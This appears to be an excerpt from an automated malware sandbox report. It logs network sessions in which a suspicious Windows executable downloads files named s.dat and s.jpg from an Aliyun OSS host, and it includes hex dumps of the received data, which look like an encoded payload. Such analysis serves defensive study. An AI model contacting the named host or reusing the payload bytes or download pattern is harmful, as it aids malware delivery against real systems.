PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-13 12:54:16 UTC	4096	IN	Data Raw: 76 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4 Data Ascii: v;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>\|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V\|
2025-01-13 12:54:16 UTC	4096	IN	Data Raw: 77 a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f Data Ascii: wV(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi\|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
2025-01-13 12:54:16 UTC	4096	IN	Data Raw: 97 9b 9d 99 9d 9b 95 97 95 8b 8d 89 8d 8b b5 b7 b5 bb bd bf 2d db b5 b7 b1 8b 8d 8f 8d 8b 95 95 95 fb 9c 9f 9d 8b 95 97 95 8b 8d 8f 9d 8b f5 f7 f5 fb fd ff fd eb f5 f7 f5 8b 8d 8f 9d 8b 95 97 95 9b 9d 9f 9d 9b 95 87 95 8b 8d 8f 12 a4 b5 e6 b5 bb bd ff 4a 92 b5 3b b5 8b 8d 8f 0d eb 95 77 94 9b 9d df 82 fb 95 0f a8 8b 8d 8f 8d 8b 75 77 75 7b 7d 7f 1d 1b 75 47 60 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b b5 b7 b5 bb bd bf bd bb b5 b7 b5 8b 8d 8f 93 eb 95 d7 94 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f cd ae f5 7f f5 fb fd ff fd fb f5 f7 f5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d a1 f9 ee cd c3 b5 bb bd ef d4 ba b5 b7 a5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b 75 57 75 7b 1d 51 0f 1f 14 03 14 8b 8d f9 36 8b 95 Data Ascii: -J;wuwu{}uG`uWu{Q6
2025-01-13 12:54:17 UTC	4096	IN	Data Raw: 69 18 0b cc ef 77 23 0b dc 62 f5 92 bd ff f0 55 8b 71 aa 3a 3d 2b 0e e8 a2 e1 cd ea 57 ca 72 3f 3b a3 53 99 f3 19 2d 50 82 0e 0d 67 11 12 78 ff f7 c0 c2 9c d0 1f 35 b3 d6 c1 15 8b 71 1a 1f 9f 00 52 44 b6 6f bf 5c 42 7e 10 b4 79 e0 70 9b ec ea 3e 72 2b 74 62 9c c8 03 89 51 17 b4 ee 50 26 6c f4 04 88 dc ad 35 53 4d 06 b8 17 18 42 ac 5e c3 76 8a e3 0f 55 bd 10 fb 3f 3d a9 48 9d ea 3a a4 e2 a6 b4 3f 76 ce a4 1c 7c fb f9 82 7d fe 97 54 b4 b3 68 d2 ca 6b fa 63 cb 18 ff 4a 19 f9 7b ce a8 14 4b 2d e1 e4 ac ec 85 7b 1e 75 a1 29 ef 25 b4 c1 12 a6 c8 7c 21 bf 95 a2 cb d0 51 3b 62 af 3a aa cc 42 6d 00 8c 79 d0 be 06 b6 82 9f 76 84 17 1f 9e 9d b0 29 42 92 30 ee 02 cb 2e 78 cc a6 12 f0 07 e3 66 63 9f 49 05 39 61 2f 8e d5 7d 9a 70 87 1f c6 95 13 f3 f5 88 62 22 f4 1a 33 Data Ascii: iw#bUq:=+Wr?;S-Pgx5qRDo\B~yp>r+tbQP&l5SMB^vU?=H:?v\|}ThkcJ{K-{u)%\|!Q;b:Bmyv)B0.xfcI9a/}pb"3
2025-01-13 12:54:17 UTC	4096	IN	Data Raw: 59 fc a8 65 45 fc 8d 05 fd fb b3 9f 14 a2 f6 f8 cc c4 eb 39 9d d3 a3 9f a0 42 0a 18 58 74 c7 69 1d eb 8b bf f8 0a 86 d0 b8 94 b7 61 b0 9e 73 a2 69 b3 40 d3 c4 61 59 75 53 34 0e c7 4a cf b1 8f a5 1c 40 ae d5 10 f9 b3 9d 63 52 15 9e 8b 52 f6 a8 f0 ad 49 d7 f7 72 8e 78 64 f5 39 5f 0b 52 de 78 1c 55 45 37 4b fa 52 4d 22 ef 1a 7a 2b 77 55 11 34 b8 02 76 4b bc 41 00 36 50 70 72 34 04 b2 fc fc b3 02 62 64 d3 fa df dd e5 b8 e2 bd 6c e5 a6 e2 23 8e 49 61 66 4b de 3e d6 1f 11 74 6a d1 49 c0 da 1e df 8c f9 36 8a 61 dc e3 8e c6 1a 21 61 99 12 00 4b bc 3f 2f 86 71 66 94 e7 b9 fd a5 2f a6 09 9c b6 7f c9 3c 7d 99 5e d8 fd f5 f6 1c ce 71 0e c8 38 12 5d a5 a6 a8 b9 81 05 24 3e 7f 87 5f e9 b2 ac d8 50 4b 41 40 ae 76 80 40 a4 58 df 93 6f bb a4 25 c4 dc 1b f9 98 6d 46 50 50 Data Ascii: YeE9BXtiasi@aYuS4J@cRRIrxd9_RxUE7KRM"z+wU4vKA6Ppr4bdl#IafK>tjI6a!aK?/qf/<}^q8]$>_PKA@v@Xo%mFPP
2025-01-13 12:54:17 UTC	4096	IN	Data Raw: 82 6b 24 f1 76 c7 84 af a6 d8 72 87 9e 02 98 c2 20 b2 f1 7e 40 de 11 c4 b7 04 70 3b 4c f8 6d db 2d a9 ce 60 f5 10 4c 12 54 c5 c0 72 2e a1 d8 20 3a 3e 2a 25 eb 4b 0d 65 55 1a c4 48 1a 5e 6a 05 eb 8f 85 11 75 4e 9c 4d 91 ea 1e 6c 58 58 23 d5 a9 a7 43 0b 1c de b1 07 fa 5d 5e fb 87 19 ab 0f 82 15 1e ba 6f f1 63 c6 da 5d 0e ab af 31 1b bf 5a cd f6 53 1f 80 ab 2c 54 0f 0f 1b 81 1b a2 ce 13 0d 34 7e c8 33 6a cb 2c 24 f8 95 15 fe 8e 9d b5 5f fa 6f 6b 71 de 1e b5 8b 59 19 1d 09 5e ac 7c 16 63 9b d8 c8 b4 27 9d 9d bb 43 03 b0 6a a2 cc 20 6c 87 15 fd 83 53 0b 74 ba be 94 f4 dc 67 c5 f1 cb 96 3f f5 5d c0 5a b8 19 35 ae dd 45 b8 22 e8 49 6d f7 25 8d 40 da 70 d0 35 af 4d f4 b8 23 50 f0 45 df 6d c4 90 0a 98 39 7d 78 78 2e 64 92 61 cf c0 27 77 aa e9 3f f8 8d 38 ff 14 79 Data Ascii: k$vr ~@p;Lm-`LTr. :>*%KeUH^juNMlXX#C]^oc]1ZS,T4~3j,$_okqY^\|c'Cj lStg?]Z5E"Im%@p5M#PEm9}xx.da'w?8y
2025-01-13 12:54:17 UTC	4096	IN	Data Raw: 7d 65 0f 82 22 33 6c 58 70 0d b8 a6 df ea 7b 6d 7a 5f 99 fd 73 8d 00 c9 26 96 32 5f 9a 2d 5f 52 cd c3 af 35 d2 10 ab ac 7d 75 1f 92 32 53 12 21 c0 0e a8 ca d8 dd c7 d0 35 03 63 e9 2c 3e eb 04 88 24 5d 20 1c fa f5 63 e0 67 b3 2a db a8 82 4f 91 91 6e 78 3a 77 32 95 d2 d2 f3 31 f7 3a 09 7f 6b 09 80 20 ed f3 ca fa b6 ca 1e 07 6f f1 ea 8e 7e 4f df f1 ee 66 ca 0f a7 51 14 14 36 25 dc 96 50 91 b0 60 93 09 88 28 f5 58 20 ee bf f1 ff 75 17 d6 a0 c8 e1 27 4f 1e 06 29 03 1c 90 34 5d e2 3e e3 1d 28 c6 67 37 ac 93 2b e2 78 8e 2e d7 4d 83 2a 0a 90 3e 9f 8f 15 a3 7a 0a 90 76 d6 47 dd 4b e2 82 19 56 f6 3f ee a6 6f 8c 4a 79 5f df 1d 79 90 90 40 b3 29 a8 08 35 66 cc 97 f8 29 cb b8 4b 89 f7 f9 13 42 7a ec 0b d1 0c f7 79 ec 74 3d d3 55 25 47 d7 82 00 94 7d a5 84 da b6 7d d4 Data Ascii: }e"3lXp{mz_s&2_-_R5}u2S!5c,>$] cgOnx:w21:k o~OfQ6%P`(X u'O)4]>(g7+x.M>zvGKV?oJy_y@)5f)KBzyt=U%G}}
2025-01-13 12:54:17 UTC	4096	IN	Data Raw: e8 d2 e7 86 d8 b8 2d 86 04 1b e1 8b 98 09 7a 3b fe 9c 4d 52 15 f8 12 ed 29 9d a8 0f 40 e6 e5 0b eb ad 15 c7 ff 17 26 89 1c e1 b5 91 c7 16 33 50 17 9c 37 41 d3 06 73 61 28 5f ab 72 93 98 00 8a 6a 27 25 8b 41 b0 e7 2a 40 2e 6b be e6 f0 18 0c d2 28 51 ab 0c 08 02 67 5f 1a 0c 87 3a cc d9 74 dd c0 fd 7b 99 48 59 37 8d c3 26 3f 4d cf ea ea 8f 47 36 91 83 9c f4 2f 52 87 f9 10 b6 44 68 27 93 d2 36 2f 5d 2c 59 59 de 90 b4 e8 85 d4 e9 71 8f 42 65 b0 d8 16 f6 ff 1e 3b 4d 23 fa 1f 9e 5f 66 d6 96 8f 3f 35 40 28 de 44 3a fe c4 20 45 37 b3 18 0e ff ad 2b a7 83 7e 88 3a 6c b9 b9 31 4d dd 30 2d 5f e5 98 94 26 e7 f1 17 4f ba 13 8e 17 f2 ca 4c 08 6f 8e 74 4a 05 8d c4 24 3d 4b fb 22 c3 67 31 f6 85 11 26 a8 6e cf 31 7a 78 b7 f3 05 66 c0 b6 4d c3 3a 0e 1c bb 55 6d 30 27 5a a7 Data Ascii: -z;MR)@&3P7Asa(_rj'%A*@.k(Qg_:t{HY7&?MG6/RDh'6/],YYqBe;M#_f?5@(D: E7+~:l1M0-_&OLotJ$=K"g1&n1zxfM:Um0'Z
2025-01-13 12:54:17 UTC	4096	IN	Data Raw: ed 6d 99 07 e4 c7 b2 15 b2 42 6c 84 38 c1 7d 64 0c 9a 79 ff 71 01 27 59 e8 ac 0f 20 7d b1 81 7f 87 9c 7d 37 13 a4 d8 58 fb d7 aa 0d 1a 88 06 95 72 33 fc a9 08 eb 61 e5 1b 19 63 d2 aa 09 e2 b9 52 e1 a4 8a 08 e0 3b 67 e2 cf e9 55 97 b7 28 79 76 3f a4 7b d0 9c 14 c0 80 dc ab f5 4d 7c f8 cf 89 4a 4c ec 7a 99 13 8b 9f bf 89 fd cb 07 5c 57 9b f8 f0 51 1b 72 ea b3 52 b0 4e d4 50 16 0e f6 43 a8 45 5e f8 99 90 3e a9 4a 8f 23 54 4d 98 d2 f6 51 e0 54 ce c8 f3 3b ec 5d 4b 96 31 6f 39 fe 82 8b 66 a4 22 6a 74 1d 57 6f 34 15 b0 16 87 b1 79 02 74 8a 6e 8c ba ef c4 ed 35 cc c8 82 2e 56 35 d3 9b 89 05 6d 16 f0 98 8a 0e 66 25 2b c7 a1 c9 f5 3e b0 50 22 fe a6 40 5f f9 be 1c 04 3a 5e 6a f5 4b 68 7a cb ed b4 ba f8 98 a8 7f 86 9c b5 87 da e8 1e 72 b0 c5 a5 2a a9 48 4a cf 41 64 Data Ascii: mBl8}dyq'Y }}7Xr3acR;gU(yv?{M\|JLz\WQrRNPCE^>J#TMQT;]K1o9f"jtWo4ytn5.V5mf%+>P"@_:^jKhzr*HJAd

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49766	59.110.190.21	443	7448	C:\Users\user\Desktop\149876985-734579485.05.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 12:54:24 UTC	106	OUT	GET /s.dat HTTP/1.1 User-Agent: 3M Host: khec3y.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-13 12:54:24 UTC	561	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Mon, 13 Jan 2025 12:54:24 GMT Content-Type: application/octet-stream Content-Length: 28272 Connection: close x-oss-request-id: 67850D00DCC23B39314E8E90 Accept-Ranges: bytes ETag: "48799898E02E7C1A351095A6FAAEB500" Last-Modified: Mon, 13 Jan 2025 12:54:03 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 11195586260885592155 x-oss-storage-class: Standard x-oss-ec: 0048-00000113 Content-Disposition: attachment x-oss-force-download: true Content-MD5: SHmYmOAufBo1EJWm+q61AA== x-oss-server-time: 10
2025-01-13 12:54:24 UTC	3535	IN	Data Raw: f5 e2 28 b8 bb b8 b8 b8 bc b8 b8 b8 47 47 b8 b8 00 b8 b8 b8 b8 b8 b8 b8 f8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 50 b8 b8 b8 b6 a7 02 b6 b6 02 bf 7b 5a c3 7a 37 fa 16 63 5f 36 2c 7f 2f 5d 40 48 5d 3c 30 7d 3e 5f 50 50 51 25 71 33 34 14 46 41 5a 7a 33 34 7a 3e 35 29 5a 37 35 3e 3f 11 32 32 35 11 35 35 35 35 35 35 35 f6 81 47 5c db 89 40 66 e1 b3 7a 5c db 89 40 66 e1 b3 7b 5c e4 89 40 66 e8 cb e9 5c d8 89 40 66 e8 cb ef 5c d8 89 40 66 e8 cb f9 5c df 89 40 66 e8 cb f0 5c d5 89 40 66 e8 cb ee 5c da 89 40 66 e8 cb eb 5c da 89 40 66 34 0f 05 0e 89 db 12 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 64 71 34 34 50 b2 3c 34 c2 67 ad 62 62 62 62 62 62 62 62 62 92 62 40 Data Ascii: (GGP{Zz7c_6,/]@H]<0}>_PPQ%q34FAZz34z>5)Z75>?2255555555G\@fz\@f{\@f\@f\@f\@f\@f\@f\@f44444444444444444444444444dq44P<4gbbbbbbbbbb@
2025-01-13 12:54:24 UTC	4096	IN	Data Raw: 23 5f 05 23 23 56 27 a8 d8 33 c7 9d eb 2b a7 66 a7 83 f7 ef 2a 7e 0e 7a 6b e6 23 60 e2 be c6 b2 1d 08 46 3b 1d 1d 96 61 39 69 71 02 d2 a7 c2 59 15 5c 9c 11 31 89 34 31 31 b1 d8 bd 31 31 31 75 0a e5 79 0d b1 b4 b1 b1 31 da 49 d9 4c 5a 4c 4c 04 8f f4 4c 3f fc 4a 38 87 86 87 87 47 ac 2b 0a cc 09 ff 1e 84 0f 49 6c b1 90 b1 b1 f5 7e eb b1 7e 8d 3a f7 23 23 1a 3d 55 1c 1d d6 90 84 dc 1d fe de b7 75 bb 43 f3 36 f6 f4 bf 7b a3 b3 eb 2a e6 12 a7 6d a3 a3 e2 1b a3 a2 a3 a3 2a 6f d6 6b 25 92 60 2b 43 ca 06 43 ab 0f b6 ab ab ea 54 6d e2 63 27 ca e3 e3 e3 ab 62 a7 72 63 62 62 26 59 54 26 eb df 9b 10 58 d2 12 1e 36 5a 99 c5 bd c1 d1 5a bd f5 b1 f9 32 75 91 d0 cf d0 cc 8d 90 93 92 51 5e 5e 5e 92 92 92 92 da 19 56 da 53 82 d2 92 1b fa 82 da 53 aa c2 92 1b ea b2 d3 87 92 Data Ascii: #_##V'3+f~zk#`F;a9iqY\1411111uy1ILZLLL?J8G+Il~~:##=UuC6{m*ok%`+CCTmc'brcbb&YT&X6ZZ2uQ^^^VSS
2025-01-13 12:54:24 UTC	4096	IN	Data Raw: 8e 07 0a aa de df de de 96 1b c2 b2 b2 fa 3f fe 96 b6 d3 a5 5f 1a 6c 9f 6c b7 ab 28 48 78 54 49 48 48 b7 5d e9 fe e9 e9 a1 2c ed 85 91 6e 84 1f 86 86 86 0d c2 e6 f6 86 4f 14 4e cc b7 b2 c2 9e 3c 78 18 04 bf 47 bd ca b7 3a ef b6 5e d1 5e 5e 5e 1f 65 9d 2b 21 90 29 2b 2b 2b c2 ab ab ab ab 90 53 e5 ec d1 5a 0a 3a a6 25 5e a0 d3 84 58 97 f7 cf b6 cc 34 41 24 70 0c 90 28 46 0d 0d 0d 02 98 5b 1b 5b 9e 75 c7 a5 5d 28 4d 19 65 f9 41 2f 64 64 64 6b f1 32 72 32 f5 1e b0 76 0d 0f 78 1d 49 71 d5 6d 03 02 03 03 0c 99 cf 8f cf c7 24 ff 4c b4 4f 39 67 23 5f fb 43 09 42 43 43 4c d6 80 c0 03 ca 2b db 58 23 d1 ae b8 97 f2 8a b2 ff 9a ce f6 52 ea 84 85 84 84 3c 30 3c 3c 3c 33 78 e4 7d 56 a6 09 4a 0b 61 91 3e 15 7f 15 e5 91 fa a4 ce 15 ba ef 8f a4 54 fb 93 d2 b8 48 e7 ee a6 Data Ascii: ?_ll(HxTIHH],nON<xG:^^^^e+!)+++SZ:%^X4A$p(F[[u](MeA/dddk2r2vxIqm$LO9g#_CBCCL+X#R<0<<<3x}VJa>TH
2025-01-13 12:54:24 UTC	4096	IN	Data Raw: 38 30 4a 59 ce 0f c9 ba f8 0e 39 f9 8c 87 c4 73 45 cf 41 4f 0c f3 c4 84 0d fb cc 0f 79 76 31 fa 90 92 f6 1b 94 9e dd 17 7c 7e 1a f5 7d 8b bc 79 09 04 41 8a e0 e4 6b e4 ea a3 69 02 ee 67 ef a3 65 ad 2c a4 8c 89 f9 dc c1 4a 09 88 00 e9 03 74 14 5c 97 fd 1c 54 97 18 16 5f e9 df 5e d7 5f 2b ae e7 2d 4e a9 e4 2c 69 dc db 95 57 1f dc 10 00 1f 57 e0 d6 95 91 9f dc 6a a2 e2 6b 1f ec 56 94 dc 1f ba ba ba dc dc dc dc d3 c3 58 dc dc dc dc dc ba ba ba 4c 2a 2a dc 05 84 fc 05 25 25 25 56 67 2f ec 23 6d 95 21 e6 39 33 c9 71 ba 53 9a f2 33 72 2b 7f ba eb aa f2 31 75 3b 39 7d f6 69 77 34 cb fd 7c bd fc b5 f1 34 25 41 e1 7d fe 9d 62 94 e7 6b 6b 6b 0d 0d 0d 0d 02 12 89 0d 0d 0d 0d 0d 6b 9d 45 8c 76 8c 7c 73 8c 04 c6 cb eb cb cb cb 83 4a 22 4b 4b 4b 4b 44 5c 40 4e 4b 53 0f Data Ascii: 80JY9sEAOyv1\|~}yAkige,Jt\T_^_+-N,iWWjkVXL**%%%Vg/#m!93qS3r+1u;9}iw4\|4%A}bkkkkEv\|sJ"KKKKD\@NKS
2025-01-13 12:54:24 UTC	4096	IN	Data Raw: 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 68 7b 60 ab 47 9b e3 20 f9 68 ad 35 1d 35 35 35 7d b8 79 11 31 ee 04 f4 3b 0b 0b bc 31 f0 98 9c 63 89 4e 53 ac ac 1b d8 93 d0 27 cd 15 02 32 32 7a b1 f6 02 59 c1 ce ce 92 ce 8a ce a1 ce bd ce 8a ce ab ce b8 ce a7 ce ad ce ab ce bd ce 92 ce 9a ce bc ce bb ce ab ce 9d ce a7 ce a9 ce a6 ce ba ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce Data Ascii: (((((((((((((((((((((((((((((((((((((((((((((((((((((((((h{`G h5555}y1;1cNS'22zY
2025-01-13 12:54:24 UTC	4096	IN	Data Raw: ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad fd ad ad e9 ad ad ad bd 0c b5 0c 2c ad 24 ad 9d 0c 95 0c 4c ad 44 ad fd 0c f5 0c 6c ad 64 ad dd 0c d5 0c 8c ad 84 ad 3d 0c 35 0c ac ad a4 ad 1d 0c 15 0c cc ad c4 ad 7d 0c 75 0c ec ad e4 ad 5d 0c 55 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c Data Ascii: ,$LDld=5}u]U
2025-01-13 12:54:24 UTC	4096	IN	Data Raw: 67 47 a9 09 fd fc 12 13 1d 3c 88 0c c6 10 da 45 42 60 a9 c1 bc 1a 11 a7 e0 2e 22 2b 0a 8c d8 4c df a8 56 70 b6 bc 66 f5 56 67 09 82 f2 d3 a3 55 15 ce e3 6f 81 d8 c2 03 30 7c 10 15 ac 5c 86 7e 88 07 1f ba 3a fb b8 4b 9a 62 ec 00 e7 8e 85 12 6b 82 15 59 35 78 08 43 90 93 b7 4d 24 38 15 5e 33 ae 0e 03 b1 b4 8a 81 33 30 10 93 30 32 31 32 32 38 53 12 7f cb 7f 7f 7f 7f 7f 58 4f 42 49 46 65 e3 2d e3 92 9f 93 93 97 92 97 a7 e8 d9 e3 d8 e1 e7 e2 b4 e5 e3 f6 e7 b0 e3 81 a3 80 91 86 83 d5 d1 dd c6 df 88 be ac b7 de d9 d0 c3 ac ad f2 d3 e3 dd d5 d0 85 d4 d7 c3 c4 91 a6 a7 ca c8 c9 c3 f2 dd f3 df d9 dc 8a db d1 c8 ce 96 ff f5 e4 f9 8a 96 9f 8d ad ce e2 ff 8f 90 8d 9e ea f7 f1 f0 c1 d9 c0 d7 d1 d4 82 d3 d0 c0 f3 9e f7 fd ec f1 82 9e 97 85 a5 c6 ea e1 84 c1 b7 84 f6 ed Data Ascii: gG<EB`."+LVpfVgUo0\|\~:KbkY5xCM$8^330021228SXOBIFe-
2025-01-13 12:54:24 UTC	161	IN	Data Raw: 27 bc 56 8d a1 48 a7 d8 db 20 3c c6 64 eb a7 f5 dc 87 01 85 4d b3 73 df 7e 2f 72 c3 fe 90 7f 53 03 95 c3 69 b4 78 70 7f 47 cd 54 d7 16 ca e8 7a 26 d7 20 64 6e df e5 43 1a 7a 90 7c ad 5f 36 aa 81 b5 fe 6e b2 cd cf ba 1d 41 b4 54 53 e9 3f 79 f1 5e 23 29 65 39 09 a1 03 8d 0a fe 23 25 a7 5c cd 0e 5d 86 0a 45 0c 38 50 e4 30 db dd d2 af bb de fa 16 60 6f 98 ea 3b 50 91 e8 7f a4 41 45 cc 50 fe 5e b5 e2 5c 31 55 2a 67 69 1d 23 55 9c 19 fe aa 01 a8 35 68 df e2 53 d9 70 80 53 51 13 87 b6 Data Ascii: 'VH <dMs~/rSixpGTz& dnCz\|_6nATS?y^#)e9#%\]E8P0`o;PAEP^\1U*gi#U5hSpSQ

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49775	59.110.190.21	443	7448	C:\Users\user\Desktop\149876985-734579485.05.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 12:54:26 UTC	106	OUT	GET /s.jpg HTTP/1.1 User-Agent: 3M Host: khec3y.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-13 12:54:26 UTC	543	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Mon, 13 Jan 2025 12:54:26 GMT Content-Type: image/jpeg Content-Length: 8299 Connection: close x-oss-request-id: 67850D0251FCAD3532F446B4 Accept-Ranges: bytes ETag: "9BDB6A4AF681470B85A3D46AF5A4F2A7" Last-Modified: Mon, 13 Jan 2025 11:34:40 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 692387538176721524 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: m9tqSvaBRwuFo9Rq9aTypw== x-oss-server-time: 3
2025-01-13 12:54:26 UTC	3553	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2025-01-13 12:54:26 UTC	4096	IN	Data Raw: 6a 97 a0 76 9f 8a 4c ce c2 04 d4 99 b6 a3 2e 14 ad df 13 51 65 93 89 43 91 9f a1 22 66 8b 67 93 6a a2 a8 41 af 7a 2c ae 4c aa 83 63 3f 31 b1 0c 38 b2 5a bc ee 9f ac 38 b8 3b d8 89 02 c6 e4 8d 4f 83 68 c8 cb e9 cd 46 82 eb f8 de 65 da d0 b3 5f 34 d9 d6 6d db 55 d9 bc fb a3 e2 61 23 e6 e4 e3 87 ec ad ee cf c4 48 ef c7 73 cd d6 f3 c4 81 f4 1c 39 58 f8 db f6 39 e6 54 8a 0c ef 0e 3c c4 02 47 ce 01 4a eb 07 3d 8b cf 64 01 b1 11 50 1f 56 fc 58 fd 52 90 48 39 56 7e 31 61 02 cb 69 da d9 d8 cc 26 ee 13 ab 4c 25 c9 2d d0 31 03 dc f8 c8 d7 3b 32 53 27 d0 3e e3 d2 43 01 15 0b c5 c7 aa 26 cf 01 8d 0f 68 05 6c 61 40 dc 57 84 5a 54 79 13 7c 39 5f 3b 5d be 3a 5e 38 29 ef 27 40 e5 0e 2f e3 91 59 ab d5 8c 1a 9b 83 db 73 71 24 d7 68 16 7f 18 08 bb 51 3d 32 5b d8 c4 b1 43 a5 Data Ascii: jvL.QeC"fgjAz,Lc?18Z8;OhFe_4mUa#Hs9X9T<GJ=dPVXRH9V~1ai&L%-1;2S'>C&hla@WZTy\|9_;]:^8)'@/Ysq$hQ=2[C
